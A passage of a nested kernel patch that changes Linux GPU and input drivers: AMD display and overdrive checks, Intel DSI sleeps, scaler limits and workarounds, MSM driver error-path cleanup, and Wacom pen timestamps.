+ #endif //__DAL_DCCG_H__
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h b/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h
+index a4d61bb724b67..39bd53b790201 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h
+@@ -115,6 +115,10 @@ struct hwseq_private_funcs {
+ 	void (*plane_atomic_disable)(struct dc *dc, struct pipe_ctx *pipe_ctx);
+ 	void (*enable_power_gating_plane)(struct dce_hwseq *hws,
+ 		bool enable);
++	void (*dpp_root_clock_control)(
++			struct dce_hwseq *hws,
++			unsigned int dpp_inst,
++			bool clock_on);
+ 	void (*dpp_pg_control)(struct dce_hwseq *hws,
+ 			unsigned int dpp_inst,
+ 			bool power_on);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
+index a76da0131addd..9c20516be066c 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
+@@ -130,12 +130,13 @@ void dmub_dcn32_reset(struct dmub_srv *dmub)
+ 	REG_WRITE(DMCUB_INBOX1_WPTR, 0);
+ 	REG_WRITE(DMCUB_OUTBOX1_RPTR, 0);
+ 	REG_WRITE(DMCUB_OUTBOX1_WPTR, 0);
++	REG_WRITE(DMCUB_OUTBOX0_RPTR, 0);
++	REG_WRITE(DMCUB_OUTBOX0_WPTR, 0);
+ 	REG_WRITE(DMCUB_SCRATCH0, 0);
+ }
+ 
+ void dmub_dcn32_reset_release(struct dmub_srv *dmub)
+ {
+-	REG_WRITE(DMCUB_GPINT_DATAIN1, 0);
+ 	REG_UPDATE(MMHUBBUB_SOFT_RESET, DMUIF_SOFT_RESET, 0);
+ 	REG_WRITE(DMCUB_SCRATCH15, dmub->psp_version & 0x001100FF);
+ 	REG_UPDATE_2(DMCUB_CNTL, DMCUB_ENABLE, 1, DMCUB_TRACEPORT_EN, 1);
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_dpm.c b/drivers/gpu/drm/amd/pm/amdgpu_dpm.c
+index 1b300c569faf5..69b51612c39a5 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_dpm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_dpm.c
+@@ -36,6 +36,8 @@
+ #define amdgpu_dpm_enable_bapm(adev, e) \
+ 		((adev)->powerplay.pp_funcs->enable_bapm((adev)->powerplay.pp_handle, (e)))
+ 
++#define amdgpu_dpm_is_legacy_dpm(adev) ((adev)->powerplay.pp_handle == (adev))
++
+ int amdgpu_dpm_get_sclk(struct amdgpu_device *adev, bool low)
+ {
+ 	const struct amd_pm_funcs *pp_funcs = adev->powerplay.pp_funcs;
+@@ -1414,15 +1416,24 @@ int amdgpu_dpm_get_smu_prv_buf_details(struct amdgpu_device *adev,
+ 
+ int amdgpu_dpm_is_overdrive_supported(struct amdgpu_device *adev)
+ {
+-	struct pp_hwmgr *hwmgr = adev->powerplay.pp_handle;
+-	struct smu_context *smu = adev->powerplay.pp_handle;
++	if (is_support_sw_smu(adev)) {
++		struct smu_context *smu = adev->powerplay.pp_handle;
+ 
+-	if ((is_support_sw_smu(adev) && smu->od_enabled) ||
+-	    (is_support_sw_smu(adev) && smu->is_apu) ||
+-		(!is_support_sw_smu(adev) && hwmgr->od_enabled))
+-		return true;
++		return (smu->od_enabled || smu->is_apu);
++	} else {
++		struct pp_hwmgr *hwmgr;
+ 
+-	return false;
++		/*
++		 * dpm on some legacy asics don't carry od_enabled member
++		 * as its pp_handle is casted directly from adev.
++		 */
++		if (amdgpu_dpm_is_legacy_dpm(adev))
++			return false;
++
++		hwmgr = (struct pp_hwmgr *)adev->powerplay.pp_handle;
++
++		return hwmgr->od_enabled;
++	}
+ }
+ 
+ int amdgpu_dpm_set_pp_table(struct amdgpu_device *adev,
+diff --git a/drivers/gpu/drm/bridge/lontium-lt8912b.c b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+index 1b74a913f1b8f..5e419934d2a39 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt8912b.c
++++ b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+@@ -504,7 +504,6 @@ static int lt8912_attach_dsi(struct lt8912 *lt)
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+ 
+ 	dsi->mode_flags = MIPI_DSI_MODE_VIDEO |
+-			  MIPI_DSI_MODE_VIDEO_BURST |
+ 			  MIPI_DSI_MODE_LPM |
+ 			  MIPI_DSI_MODE_NO_EOT_PACKET;
+ 
+diff --git a/drivers/gpu/drm/i915/display/icl_dsi.c b/drivers/gpu/drm/i915/display/icl_dsi.c
+index c62bb9e2c1743..4d34a24ee7b0d 100644
+--- a/drivers/gpu/drm/i915/display/icl_dsi.c
++++ b/drivers/gpu/drm/i915/display/icl_dsi.c
+@@ -1211,7 +1211,7 @@ static void gen11_dsi_powerup_panel(struct intel_encoder *encoder)
+ 
+ 	/* panel power on related mipi dsi vbt sequences */
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_POWER_ON);
+-	intel_dsi_msleep(intel_dsi, intel_dsi->panel_on_delay);
++	msleep(intel_dsi->panel_on_delay);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DEASSERT_RESET);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_INIT_OTP);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DISPLAY_ON);
+diff --git a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+index 2cbc1292ab382..f102c13cb9590 100644
+--- a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
++++ b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+@@ -762,17 +762,6 @@ void intel_dsi_vbt_exec_sequence(struct intel_dsi *intel_dsi,
+ 		gpiod_set_value_cansleep(intel_dsi->gpio_backlight, 0);
+ }
+ 
+-void intel_dsi_msleep(struct intel_dsi *intel_dsi, int msec)
+-{
+-	struct intel_connector *connector = intel_dsi->attached_connector;
+-
+-	/* For v3 VBTs in vid-mode the delays are part of the VBT sequences */
+-	if (is_vid_mode(intel_dsi) && connector->panel.vbt.dsi.seq_version >= 3)
+-		return;
+-
+-	msleep(msec);
+-}
+-
+ void intel_dsi_log_params(struct intel_dsi *intel_dsi)
+ {
+ 	struct drm_i915_private *i915 = to_i915(intel_dsi->base.base.dev);
+diff --git a/drivers/gpu/drm/i915/display/intel_dsi_vbt.h b/drivers/gpu/drm/i915/display/intel_dsi_vbt.h
+index dc642c1fe7efd..468d873fab1ae 100644
+--- a/drivers/gpu/drm/i915/display/intel_dsi_vbt.h
++++ b/drivers/gpu/drm/i915/display/intel_dsi_vbt.h
+@@ -16,7 +16,6 @@ void intel_dsi_vbt_gpio_init(struct intel_dsi *intel_dsi, bool panel_is_on);
+ void intel_dsi_vbt_gpio_cleanup(struct intel_dsi *intel_dsi);
+ void intel_dsi_vbt_exec_sequence(struct intel_dsi *intel_dsi,
+ 				 enum mipi_seq seq_id);
+-void intel_dsi_msleep(struct intel_dsi *intel_dsi, int msec);
+ void intel_dsi_log_params(struct intel_dsi *intel_dsi);
+ 
+ #endif /* __INTEL_DSI_VBT_H__ */
+diff --git a/drivers/gpu/drm/i915/display/skl_scaler.c b/drivers/gpu/drm/i915/display/skl_scaler.c
+index d7390067b7d4c..fe5c47672580b 100644
+--- a/drivers/gpu/drm/i915/display/skl_scaler.c
++++ b/drivers/gpu/drm/i915/display/skl_scaler.c
+@@ -87,6 +87,10 @@ static u16 skl_scaler_calc_phase(int sub, int scale, bool chroma_cosited)
+ #define ICL_MAX_SRC_H 4096
+ #define ICL_MAX_DST_W 5120
+ #define ICL_MAX_DST_H 4096
++#define MTL_MAX_SRC_W 4096
++#define MTL_MAX_SRC_H 8192
++#define MTL_MAX_DST_W 8192
++#define MTL_MAX_DST_H 8192
+ #define SKL_MIN_YUV_420_SRC_W 16
+ #define SKL_MIN_YUV_420_SRC_H 16
+ 
+@@ -103,6 +107,10 @@ skl_update_scaler(struct intel_crtc_state *crtc_state, bool force_detach,
+ 	struct drm_i915_private *dev_priv = to_i915(crtc->base.dev);
+ 	const struct drm_display_mode *adjusted_mode =
+ 		&crtc_state->hw.adjusted_mode;
++	int pipe_src_w = drm_rect_width(&crtc_state->pipe_src);
++	int pipe_src_h = drm_rect_height(&crtc_state->pipe_src);
++	int min_src_w, min_src_h, min_dst_w, min_dst_h;
++	int max_src_w, max_src_h, max_dst_w, max_dst_h;
+ 
+ 	/*
+ 	 * Src coordinates are already rotated by 270 degrees for
+@@ -157,15 +165,33 @@ skl_update_scaler(struct intel_crtc_state *crtc_state, bool force_detach,
+ 		return -EINVAL;
+ 	}
+ 
++	min_src_w = SKL_MIN_SRC_W;
++	min_src_h = SKL_MIN_SRC_H;
++	min_dst_w = SKL_MIN_DST_W;
++	min_dst_h = SKL_MIN_DST_H;
++
++	if (DISPLAY_VER(dev_priv) < 11) {
++		max_src_w = SKL_MAX_SRC_W;
++		max_src_h = SKL_MAX_SRC_H;
++		max_dst_w = SKL_MAX_DST_W;
++		max_dst_h = SKL_MAX_DST_H;
++	} else if (DISPLAY_VER(dev_priv) < 14) {
++		max_src_w = ICL_MAX_SRC_W;
++		max_src_h = ICL_MAX_SRC_H;
++		max_dst_w = ICL_MAX_DST_W;
++		max_dst_h = ICL_MAX_DST_H;
++	} else {
++		max_src_w = MTL_MAX_SRC_W;
++		max_src_h = MTL_MAX_SRC_H;
++		max_dst_w = MTL_MAX_DST_W;
++		max_dst_h = MTL_MAX_DST_H;
++	}
++
+ 	/* range checks */
+-	if (src_w < SKL_MIN_SRC_W || src_h < SKL_MIN_SRC_H ||
+-	    dst_w < SKL_MIN_DST_W || dst_h < SKL_MIN_DST_H ||
+-	    (DISPLAY_VER(dev_priv) >= 11 &&
+-	     (src_w > ICL_MAX_SRC_W || src_h > ICL_MAX_SRC_H ||
+-	      dst_w > ICL_MAX_DST_W || dst_h > ICL_MAX_DST_H)) ||
+-	    (DISPLAY_VER(dev_priv) < 11 &&
+-	     (src_w > SKL_MAX_SRC_W || src_h > SKL_MAX_SRC_H ||
+-	      dst_w > SKL_MAX_DST_W || dst_h > SKL_MAX_DST_H)))	{
++	if (src_w < min_src_w || src_h < min_src_h ||
++	    dst_w < min_dst_w || dst_h < min_dst_h ||
++	    src_w > max_src_w || src_h > max_src_h ||
++	    dst_w > max_dst_w || dst_h > max_dst_h) {
+ 		drm_dbg_kms(&dev_priv->drm,
+ 			    "scaler_user index %u.%u: src %ux%u dst %ux%u "
+ 			    "size is out of scaler range\n",
+@@ -174,6 +200,21 @@ skl_update_scaler(struct intel_crtc_state *crtc_state, bool force_detach,
+ 		return -EINVAL;
+ 	}
+ 
++	/*
++	 * The pipe scaler does not use all the bits of PIPESRC, at least
++	 * on the earlier platforms. So even when we're scaling a plane
++	 * the *pipe* source size must not be too large. For simplicity
++	 * we assume the limits match the scaler source size limits. Might
++	 * not be 100% accurate on all platforms, but good enough for now.
++	 */
++	if (pipe_src_w > max_src_w || pipe_src_h > max_src_h) {
++		drm_dbg_kms(&dev_priv->drm,
++			    "scaler_user index %u.%u: pipe src size %ux%u "
++			    "is out of scaler range\n",
++			    crtc->pipe, scaler_user, pipe_src_w, pipe_src_h);
++		return -EINVAL;
++	}
++
+ 	/* mark this plane as a scaler user in crtc_state */
+ 	scaler_state->scaler_users |= (1 << scaler_user);
+ 	drm_dbg_kms(&dev_priv->drm, "scaler_user index %u.%u: "
+diff --git a/drivers/gpu/drm/i915/display/vlv_dsi.c b/drivers/gpu/drm/i915/display/vlv_dsi.c
+index 662bdb656aa30..c7270aa58bae5 100644
+--- a/drivers/gpu/drm/i915/display/vlv_dsi.c
++++ b/drivers/gpu/drm/i915/display/vlv_dsi.c
+@@ -783,7 +783,6 @@ static void intel_dsi_pre_enable(struct intel_atomic_state *state,
+ {
+ 	struct intel_dsi *intel_dsi = enc_to_intel_dsi(encoder);
+ 	struct intel_crtc *crtc = to_intel_crtc(pipe_config->uapi.crtc);
+-	struct intel_connector *connector = to_intel_connector(conn_state->connector);
+ 	struct drm_i915_private *dev_priv = to_i915(crtc->base.dev);
+ 	enum pipe pipe = crtc->pipe;
+ 	enum port port;
+@@ -831,21 +830,10 @@ static void intel_dsi_pre_enable(struct intel_atomic_state *state,
+ 	if (!IS_GEMINILAKE(dev_priv))
+ 		intel_dsi_prepare(encoder, pipe_config);
+ 
++	/* Give the panel time to power-on and then deassert its reset */
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_POWER_ON);
+-
+-	/*
+-	 * Give the panel time to power-on and then deassert its reset.
+-	 * Depending on the VBT MIPI sequences version the deassert-seq
+-	 * may contain the necessary delay, intel_dsi_msleep() will skip
+-	 * the delay in that case. If there is no deassert-seq, then an
+-	 * unconditional msleep is used to give the panel time to power-on.
+-	 */
+-	if (connector->panel.vbt.dsi.sequence[MIPI_SEQ_DEASSERT_RESET]) {
+-		intel_dsi_msleep(intel_dsi, intel_dsi->panel_on_delay);
+-		intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DEASSERT_RESET);
+-	} else {
+-		msleep(intel_dsi->panel_on_delay);
+-	}
++	msleep(intel_dsi->panel_on_delay);
++	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DEASSERT_RESET);
+ 
+ 	if (IS_GEMINILAKE(dev_priv)) {
+ 		glk_cold_boot = glk_dsi_enable_io(encoder);
+@@ -879,7 +867,7 @@ static void intel_dsi_pre_enable(struct intel_atomic_state *state,
+ 		msleep(20); /* XXX */
+ 		for_each_dsi_port(port, intel_dsi->ports)
+ 			dpi_send_cmd(intel_dsi, TURN_ON, false, port);
+-		intel_dsi_msleep(intel_dsi, 100);
++		msleep(100);
+ 
+ 		intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DISPLAY_ON);
+ 
+@@ -1007,7 +995,7 @@ static void intel_dsi_post_disable(struct intel_atomic_state *state,
+ 	/* Assert reset */
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_ASSERT_RESET);
+ 
+-	intel_dsi_msleep(intel_dsi, intel_dsi->panel_off_delay);
++	msleep(intel_dsi->panel_off_delay);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_POWER_OFF);
+ 
+ 	intel_dsi->panel_power_off_time = ktime_get_boottime();
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_regs.h b/drivers/gpu/drm/i915/gt/intel_gt_regs.h
+index 9758b0b635601..1d96c36f9efc2 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_regs.h
++++ b/drivers/gpu/drm/i915/gt/intel_gt_regs.h
+@@ -1135,6 +1135,8 @@
+ #define   ENABLE_SMALLPL			REG_BIT(15)
+ #define   SC_DISABLE_POWER_OPTIMIZATION_EBB	REG_BIT(9)
+ #define   GEN11_SAMPLER_ENABLE_HEADLESS_MSG	REG_BIT(5)
++#define   MTL_DISABLE_SAMPLER_SC_OOO		REG_BIT(3)
++#define   GEN11_INDIRECT_STATE_BASE_ADDR_OVERRIDE	REG_BIT(0)
+ 
+ #define GEN9_HALF_SLICE_CHICKEN7		MCR_REG(0xe194)
+ #define   DG2_DISABLE_ROUND_ENABLE_ALLOW_FOR_SSLA	REG_BIT(15)
+@@ -1161,7 +1163,9 @@
+ #define   THREAD_EX_ARB_MODE_RR_AFTER_DEP	REG_FIELD_PREP(THREAD_EX_ARB_MODE, 0x2)
+ 
+ #define HSW_ROW_CHICKEN3			_MMIO(0xe49c)
++#define GEN9_ROW_CHICKEN3			MCR_REG(0xe49c)
+ #define   HSW_ROW_CHICKEN3_L3_GLOBAL_ATOMICS_DISABLE	(1 << 6)
++#define   MTL_DISABLE_FIX_FOR_EOT_FLUSH		REG_BIT(9)
+ 
+ #define GEN8_ROW_CHICKEN			MCR_REG(0xe4f0)
+ #define   FLOW_CONTROL_ENABLE			REG_BIT(15)
+diff --git a/drivers/gpu/drm/i915/gt/intel_workarounds.c b/drivers/gpu/drm/i915/gt/intel_workarounds.c
+index e13052c5dae19..620071efb2fc1 100644
+--- a/drivers/gpu/drm/i915/gt/intel_workarounds.c
++++ b/drivers/gpu/drm/i915/gt/intel_workarounds.c
+@@ -3035,6 +3035,39 @@ general_render_compute_wa_init(struct intel_engine_cs *engine, struct i915_wa_li
+ 
+ 	add_render_compute_tuning_settings(i915, wal);
+ 
++	if (GRAPHICS_VER(i915) >= 11) {
++		/* This is not a Wa (although referred to as
++		 * WaSetInidrectStateOverride in places), this allows
++		 * applications that reference sampler states through
++		 * the BindlessSamplerStateBaseAddress to have their
++		 * border color relative to DynamicStateBaseAddress
++		 * rather than BindlessSamplerStateBaseAddress.
++		 *
++		 * Otherwise SAMPLER_STATE border colors have to be
++		 * copied in multiple heaps (DynamicStateBaseAddress &
++		 * BindlessSamplerStateBaseAddress)
++		 *
++		 * BSpec: 46052
++		 */
++		wa_mcr_masked_en(wal,
++				 GEN10_SAMPLER_MODE,
++				 GEN11_INDIRECT_STATE_BASE_ADDR_OVERRIDE);
++	}
++
++	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_B0, STEP_FOREVER) ||
++	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_B0, STEP_FOREVER))
++		/* Wa_14017856879 */
++		wa_mcr_masked_en(wal, GEN9_ROW_CHICKEN3, MTL_DISABLE_FIX_FOR_EOT_FLUSH);
++
++	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
++	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0))
++		/*
++		 * Wa_14017066071
++		 * Wa_14017654203
++		 */
++		wa_mcr_masked_en(wal, GEN10_SAMPLER_MODE,
++				 MTL_DISABLE_SAMPLER_SC_OOO);
++
+ 	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
+ 	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0) ||
+ 	    IS_PONTEVECCHIO(i915) ||
+diff --git a/drivers/gpu/drm/i915/i915_pci.c b/drivers/gpu/drm/i915/i915_pci.c
+index 4fada7ebe8d82..36cc4fc87c48c 100644
+--- a/drivers/gpu/drm/i915/i915_pci.c
++++ b/drivers/gpu/drm/i915/i915_pci.c
+@@ -1133,6 +1133,8 @@ static const struct intel_gt_definition xelpmp_extra_gt[] = {
+ static const struct intel_device_info mtl_info = {
+ 	XE_HP_FEATURES,
+ 	XE_LPDP_FEATURES,
++	.__runtime.cpu_transcoder_mask = BIT(TRANSCODER_A) | BIT(TRANSCODER_B) |
++			       BIT(TRANSCODER_C) | BIT(TRANSCODER_D),
+ 	/*
+ 	 * Real graphics IP version will be obtained from hardware GMD_ID
+ 	 * register.  Value provided here is just for sanity checking.
+diff --git a/drivers/gpu/drm/i915/i915_reg.h b/drivers/gpu/drm/i915/i915_reg.h
+index 4f84cda3f9b5e..bbbbeb3f47816 100644
+--- a/drivers/gpu/drm/i915/i915_reg.h
++++ b/drivers/gpu/drm/i915/i915_reg.h
+@@ -7612,8 +7612,8 @@ enum skl_power_gate {
+ 
+ #define _PLANE_CSC_RY_GY_1(pipe)	_PIPE(pipe, _PLANE_CSC_RY_GY_1_A, \
+ 					      _PLANE_CSC_RY_GY_1_B)
+-#define _PLANE_CSC_RY_GY_2(pipe)	_PIPE(pipe, _PLANE_INPUT_CSC_RY_GY_2_A, \
+-					      _PLANE_INPUT_CSC_RY_GY_2_B)
++#define _PLANE_CSC_RY_GY_2(pipe)	_PIPE(pipe, _PLANE_CSC_RY_GY_2_A, \
++					      _PLANE_CSC_RY_GY_2_B)
+ #define PLANE_CSC_COEFF(pipe, plane, index)	_MMIO_PLANE(plane, \
+ 							    _PLANE_CSC_RY_GY_1(pipe) +  (index) * 4, \
+ 							    _PLANE_CSC_RY_GY_2(pipe) + (index) * 4)
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_device.c b/drivers/gpu/drm/msm/adreno/adreno_device.c
+index cd009d56d35d5..ed1e0c650bb1a 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_device.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_device.c
+@@ -440,20 +440,21 @@ struct msm_gpu *adreno_load_gpu(struct drm_device *dev)
+ 
+ 	ret = pm_runtime_get_sync(&pdev->dev);
+ 	if (ret < 0) {
+-		pm_runtime_put_sync(&pdev->dev);
++		pm_runtime_put_noidle(&pdev->dev);
+ 		DRM_DEV_ERROR(dev->dev, "Couldn't power up the GPU: %d\n", ret);
+-		return NULL;
++		goto err_disable_rpm;
+ 	}
+ 
+ 	mutex_lock(&gpu->lock);
+ 	ret = msm_gpu_hw_init(gpu);
+ 	mutex_unlock(&gpu->lock);
+-	pm_runtime_put_autosuspend(&pdev->dev);
+ 	if (ret) {
+ 		DRM_DEV_ERROR(dev->dev, "gpu hw init failed: %d\n", ret);
+-		return NULL;
++		goto err_put_rpm;
+ 	}
+ 
++	pm_runtime_put_autosuspend(&pdev->dev);
++
+ #ifdef CONFIG_DEBUG_FS
+ 	if (gpu->funcs->debugfs_init) {
+ 		gpu->funcs->debugfs_init(gpu, dev->primary);
+@@ -462,6 +463,13 @@ struct msm_gpu *adreno_load_gpu(struct drm_device *dev)
+ #endif
+ 
+ 	return gpu;
++
++err_put_rpm:
++	pm_runtime_put_sync_suspend(&pdev->dev);
++err_disable_rpm:
++	pm_runtime_disable(&pdev->dev);
++
++	return NULL;
+ }
+ 
+ static int find_chipid(struct device *dev, struct adreno_rev *rev)
+diff --git a/drivers/gpu/drm/msm/msm_drv.c b/drivers/gpu/drm/msm/msm_drv.c
+index ee2f60b6f09b3..0987ea1af8b44 100644
+--- a/drivers/gpu/drm/msm/msm_drv.c
++++ b/drivers/gpu/drm/msm/msm_drv.c
+@@ -50,6 +50,8 @@
+ #define MSM_VERSION_MINOR	9
+ #define MSM_VERSION_PATCHLEVEL	0
+ 
++static void msm_deinit_vram(struct drm_device *ddev);
++
+ static const struct drm_mode_config_funcs mode_config_funcs = {
+ 	.fb_create = msm_framebuffer_create,
+ 	.output_poll_changed = drm_fb_helper_output_poll_changed,
+@@ -241,7 +243,8 @@ static int msm_drm_uninit(struct device *dev)
+ 		msm_fbdev_free(ddev);
+ #endif
+ 
+-	msm_disp_snapshot_destroy(ddev);
++	if (kms)
++		msm_disp_snapshot_destroy(ddev);
+ 
+ 	drm_mode_config_cleanup(ddev);
+ 
+@@ -249,19 +252,16 @@ static int msm_drm_uninit(struct device *dev)
+ 		drm_bridge_remove(priv->bridges[i]);
+ 	priv->num_bridges = 0;
+ 
+-	pm_runtime_get_sync(dev);
+-	msm_irq_uninstall(ddev);
+-	pm_runtime_put_sync(dev);
++	if (kms) {
++		pm_runtime_get_sync(dev);
++		msm_irq_uninstall(ddev);
++		pm_runtime_put_sync(dev);
++	}
+ 
+ 	if (kms && kms->funcs)
+ 		kms->funcs->destroy(kms);
+ 
+-	if (priv->vram.paddr) {
+-		unsigned long attrs = DMA_ATTR_NO_KERNEL_MAPPING;
+-		drm_mm_takedown(&priv->vram.mm);
+-		dma_free_attrs(dev, priv->vram.size, NULL,
+-			       priv->vram.paddr, attrs);
+-	}
++	msm_deinit_vram(ddev);
+ 
+ 	component_unbind_all(dev, ddev);
+ 
+@@ -399,6 +399,19 @@ static int msm_init_vram(struct drm_device *dev)
+ 	return ret;
+ }
+ 
++static void msm_deinit_vram(struct drm_device *ddev)
++{
++	struct msm_drm_private *priv = ddev->dev_private;
++	unsigned long attrs = DMA_ATTR_NO_KERNEL_MAPPING;
++
++	if (!priv->vram.paddr)
++		return;
++
++	drm_mm_takedown(&priv->vram.mm);
++	dma_free_attrs(ddev->dev, priv->vram.size, NULL, priv->vram.paddr,
++			attrs);
++}
++
+ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ {
+ 	struct msm_drm_private *priv = dev_get_drvdata(dev);
+@@ -418,6 +431,10 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 	priv->dev = ddev;
+ 
+ 	priv->wq = alloc_ordered_workqueue("msm", 0);
++	if (!priv->wq) {
++		ret = -ENOMEM;
++		goto err_put_dev;
++	}
+ 
+ 	INIT_LIST_HEAD(&priv->objects);
+ 	mutex_init(&priv->obj_lock);
+@@ -440,12 +457,12 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 
+ 	ret = msm_init_vram(ddev);
+ 	if (ret)
+-		return ret;
++		goto err_cleanup_mode_config;
+ 
+ 	/* Bind all our sub-components: */
+ 	ret = component_bind_all(dev, ddev);
+ 	if (ret)
+-		return ret;
++		goto err_deinit_vram;
+ 
+ 	dma_set_max_seg_size(dev, UINT_MAX);
+ 
+@@ -540,6 +557,17 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 
+ err_msm_uninit:
+ 	msm_drm_uninit(dev);
++
++	return ret;
++
++err_deinit_vram:
++	msm_deinit_vram(ddev);
++err_cleanup_mode_config:
++	drm_mode_config_cleanup(ddev);
++	destroy_workqueue(priv->wq);
++err_put_dev:
++	drm_dev_put(ddev);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c b/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c
+index b4729a94c34a8..898b892f11439 100644
+--- a/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c
++++ b/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c
+@@ -471,7 +471,7 @@ static int otm8009a_probe(struct mipi_dsi_device *dsi)
+ 		       DRM_MODE_CONNECTOR_DSI);
+ 
+ 	ctx->bl_dev = devm_backlight_device_register(dev, dev_name(dev),
+-						     dsi->host->dev, ctx,
++						     dev, ctx,
+ 						     &otm8009a_backlight_ops,
+ 						     NULL);
+ 	if (IS_ERR(ctx->bl_dev)) {
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 9312d611db8e5..0c6a82c665c1d 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -1308,6 +1308,9 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 
+ 	struct input_dev *pen_input = wacom->pen_input;
+ 	unsigned char *data = wacom->data;
++	int number_of_valid_frames = 0;
++	int time_interval = 15000000;
++	ktime_t time_packet_received = ktime_get();
+ 	int i;
+ 
+ 	if (wacom->features.type == INTUOSP2_BT ||
+@@ -1328,12 +1331,30 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 		wacom->id[0] |= (wacom->serial[0] >> 32) & 0xFFFFF;
+ 	}
+ 
++	/* number of valid frames */
+ 	for (i = 0; i < pen_frames; i++) {
+ 		unsigned char *frame = &data[i*pen_frame_len + 1];
+ 		bool valid = frame[0] & 0x80;
++
++		if (valid)
++			number_of_valid_frames++;
++	}
++
++	if (number_of_valid_frames) {
++		if (wacom->hid_data.time_delayed)
++			time_interval = ktime_get() - wacom->hid_data.time_delayed;
++		time_interval /= number_of_valid_frames;
++		wacom->hid_data.time_delayed = time_packet_received;
++	}
++
++	for (i = 0; i < number_of_valid_frames; i++) {
++		unsigned char *frame = &data[i*pen_frame_len + 1];
++		bool valid = frame[0] & 0x80;
+ 		bool prox = frame[0] & 0x40;
+ 		bool range = frame[0] & 0x20;
+ 		bool invert = frame[0] & 0x10;
++		int frames_number_reversed = number_of_valid_frames - i - 1;
++		int event_timestamp = time_packet_received - frames_number_reversed * time_interval;
+ 
+ 		if (!valid)
+ 			continue;
+@@ -1346,6 +1367,7 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 			wacom->tool[0] = 0;
+ 			wacom->id[0] = 0;
+ 			wacom->serial[0] = 0;
++			wacom->hid_data.time_delayed = 0;
+ 			return;
+ 		}
+ 
+@@ -1382,6 +1404,7 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 						 get_unaligned_le16(&frame[11]));
+ 			}
+ 		}
++
+ 		if (wacom->tool[0]) {
+ 			input_report_abs(pen_input, ABS_PRESSURE, get_unaligned_le16(&frame[5]));
+ 			if (wacom->features.type == INTUOSP2_BT ||
+@@ -1405,6 +1428,9 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 
+ 		wacom->shared->stylus_in_proximity = prox;
+ 
++		/* add timestamp to unpack the frames */
++		input_set_timestamp(pen_input, event_timestamp);
++
+ 		input_sync(pen_input);
+ 	}
+ }
+@@ -1895,6 +1921,7 @@ static void wacom_map_usage(struct input_dev *input, struct hid_usage *usage,
+ 	int fmax = field->logical_maximum;
+ 	unsigned int equivalent_usage = wacom_equivalent_usage(usage->hid);
+ 	int resolution_code = code;
++	int resolution = hidinput_calc_abs_res(field, resolution_code);
+ 
+ 	if (equivalent_usage == HID_DG_TWIST) {
+ 		resolution_code = ABS_RZ;
+@@ -1915,8 +1942,15 @@ static void wacom_map_usage(struct input_dev *input, struct hid_usage *usage,
+ 	switch (type) {
+ 	case EV_ABS:
+ 		input_set_abs_params(input, code, fmin, fmax, fuzz, 0);
+-		input_abs_set_res(input, code,
+-				  hidinput_calc_abs_res(field, resolution_code));
++
++		/* older tablet may miss physical usage */
++		if ((code == ABS_X || code == ABS_Y) && !resolution) {
++			resolution = WACOM_INTUOS_RES;
++			hid_warn(input,
++				 "Wacom usage (%d) missing resolution \n",
++				 code);
++		}
